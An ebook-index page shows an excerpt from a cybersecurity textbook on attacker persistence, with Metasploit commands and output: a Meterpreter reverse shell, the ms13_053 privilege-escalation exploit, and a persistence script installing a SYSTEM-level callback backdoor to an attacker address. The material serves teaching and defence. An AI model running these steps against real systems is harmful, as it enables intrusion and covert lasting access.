Home > Computers & Technology > Networking & Cloud Computing > Networks, Protocols & APIs > Networks

Cyber Operations by Mike O’Leary

Author:Mike O’Leary , Date: April 8, 2016 ,Views: 235

Cyber Operations by Mike O’Leary

Author:Mike O’Leary
Language: eng
Format: epub
Publisher: Apress, Berkeley, CA


Persistence

Another important use of malware by attackers is for persistence. Persistence scripts allow an attacker the ability to return to a compromised system without the necessity of exploiting it once again.

Suppose an attacker uses a Veil-Framework payload to gain the initial shell on a Windows 7 system.

msf exploit(handler) >

[*] 10.0.6.132:58502 Request received for /fJYS...

[*] 10.0.6.132:58502 Staging connection for target /fJYS received...

[*] Patched user-agent at offset 663656...

[*] Patched transport at offset 663320...

[*] Patched URL at offset 663384...

[*] Patched Expiration Timeout at offset 664256...

[*] Patched Communication Timeout at offset 664260...

[*] Meterpreter session 1 opened (10.0.4.252:8080 -> 10.0.6.132:58502) at 2014-11-24 16:31:17 -0500

Suppose also that the attacker follows up with the Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei) attack to gain a SYSTEM shell.

msf exploit(handler) > use exploit/windows/local/ms13_053_schlamperei

msf exploit(ms13_053_schlamperei) > set session 1

session => 1

msf exploit(ms13_053_schlamperei) > exploit

[*] Started reverse handler on 10.0.4.252:4444

[*] Launching notepad to host the exploit...

[+] Process 4052 launched.

[*] Reflectively injecting the exploit DLL into 4052...

[*] Injecting exploit into 4052...

[*] Found winlogon.exe with PID 420

[*] Sending stage (769536 bytes) to 10.0.6.132

[+] Everything seems to have worked, cross your fingers and wait for a SYSTEM shell

[*] Meterpreter session 2 opened (10.0.4.252:4444 -> 10.0.6.132:62761) at 2014-11-24 16:32:02 -0500

To create persistence, the attacker runs the persistence script in the privileged Meterpreter session. The script has a number of options, which can be found with the -h switch.

meterpreter > run persistence -h

Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

-A Automatically start a matching multi/handler to connect to the agent

-L <opt> Location in target host where to write payload to, if none %TEMP% will be used.

-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.

-S Automatically start the agent on boot as a service (with SYSTEM privileges)

-T <opt> Alternate executable template to use

-U Automatically start the agent when the User logs on

-X Automatically start the agent when the system boots

-h This help menu

-i <opt> The interval in seconds between each connection attempt

-p <opt> The port on the remote host where Metasploit is listening

-r <opt> The IP of the system running Metasploit listening for the connect back

An attacker can use this script to instruct the victim to call back to 10.0.4.252 on TCP/443 every five seconds using Meterpreter reverse HTTPS with the command

meterpreter > run persistence -A -P windows/meterpreter/reverse_https -S -i 5 -p 443 -r 10.0.4.252

[*] Running Persistance Script

[*] Resource file for cleanup created at /root/.msf4/logs/persistence/EPIMETHEUS_20141124.3240/EPIMETHEUS_20141124.3240.rc

[*] Creating Payload=windows/meterpreter/reverse_https LHOST=10.0.4.252 LPORT=443

[*] Persistent agent script is 148404 bytes long

[+] Persistent Script written to C:\Windows\TEMP\UzlCwSC.vbs

[*] Starting connection handler at port 443 for windows/meterpreter/reverse_https

[+] Multi/Handler started!

[*] Executing script C:\Windows\TEMP\UzlCwSC.vbs

[+] Agent executed with PID 792

[*] Installing as service..

[*] Creating service HTyzvBnmBPIoB

[*] Meterpreter session 3 opened (10.0.4.252:443 -> 10.0.6.132:62807) at 2014-11-24 16:32:42 -0500

By including the -S switch, this call back is included as a system service and is started as SYSTEM each time the computer boots. Even if both the Kali attack system and the target are rebooted, so long as the Kali system sets the correct handler (Meterpreter reverse HTTPS on TCP/443), when the victim boots it will call back and present the attacker with a new shell.



Download

Cyber Operations by Mike O’Leary.epub


Copyright Disclaimer:
This site does not store any files on its server. We only index and link to content provided by other sites. Please contact the content providers to delete copyright contents if any and email us, we'll remove relevant links or contents immediately.
Categories
COM & DCOM CORBA
ISDN LAN
LDAP Networks
ODBC SNMP
TCP-IP WAN
Popular ebooks
The Mikado Method by Ola Ellnestam Daniel Brolund(9786)
Sass and Compass in Action by Wynn Netherland Nathan Weizenbaum Chris Eppstein Brandon Mathis(7789)
Grails in Action by Glen Smith Peter Ledbrook(7705)
Configuring Windows Server Hybrid Advanced Services Exam Ref AZ-801 by Chris Gill(6635)
Azure Containers Explained by Wesley Haakman & Richard Hooper(6621)
Running Windows Containers on AWS by Marcio Morales(6149)
Kotlin in Action by Dmitry Jemerov(5073)
Microsoft 365 Identity and Services Exam Guide MS-100 by Aaron Guilmette(4953)
Combating Crime on the Dark Web by Nearchos Nearchou(4537)
Management Strategies for the Cloud Revolution: How Cloud Computing Is Transforming Business and Why You Can't Afford to Be Left Behind by Charles Babcock(4422)
Microsoft Cybersecurity Architect Exam Ref SC-100 by Dwayne Natwick(4404)
The Ruby Workshop by Akshat Paul
 Peter Philips 
Dániel Szabó
 and Cheyne Wallace(4206)
The Age of Surveillance Capitalism by Shoshana Zuboff(3964)
Python for Security and Networking - Third Edition by José Manuel Ortega(3776)
Learn Windows PowerShell in a Month of Lunches by Don Jones(3515)
The Ultimate Docker Container Book by Schenker Gabriel N.;(3442)
Mastering Python for Networking and Security by José Manuel Ortega(3358)
Mastering Azure Security by Mustafa Toroman and Tom Janetscheck(3337)
Learn Wireshark by Lisa Bock(3329)
Blockchain Basics by Daniel Drescher(3306)